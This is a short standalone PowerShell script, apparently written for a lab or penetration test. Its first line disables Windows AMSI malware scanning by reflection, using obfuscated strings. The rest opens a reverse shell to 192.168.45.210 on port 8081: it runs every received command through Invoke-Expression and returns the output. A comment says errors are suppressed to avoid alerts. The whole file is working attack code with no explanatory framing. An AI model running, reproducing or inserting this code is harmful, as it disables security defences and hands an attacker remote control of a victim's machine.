$w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils'; $assembly = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m)); $field = $assembly.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static'); $field.SetValue($null,$true)

try {
    $client = New-Object System.Net.Sockets.TCPClient('192.168.45.210', 8081)
    $stream = $client.GetStream()
    [byte[]]$bytes = 0..65535 | ForEach-Object { 0 }

    while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
        try {
            $sendback = (Invoke-Expression $data 2>&1 | Out-String)
        } catch {
            $sendback = $_.Exception.Message
        }
        $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte, 0, $sendbyte.Length)
        $stream.Flush()
    }
    $client.Close()
} catch {
    # Handle errors silently to avoid alerts
    Start-Sleep -Seconds 5
}
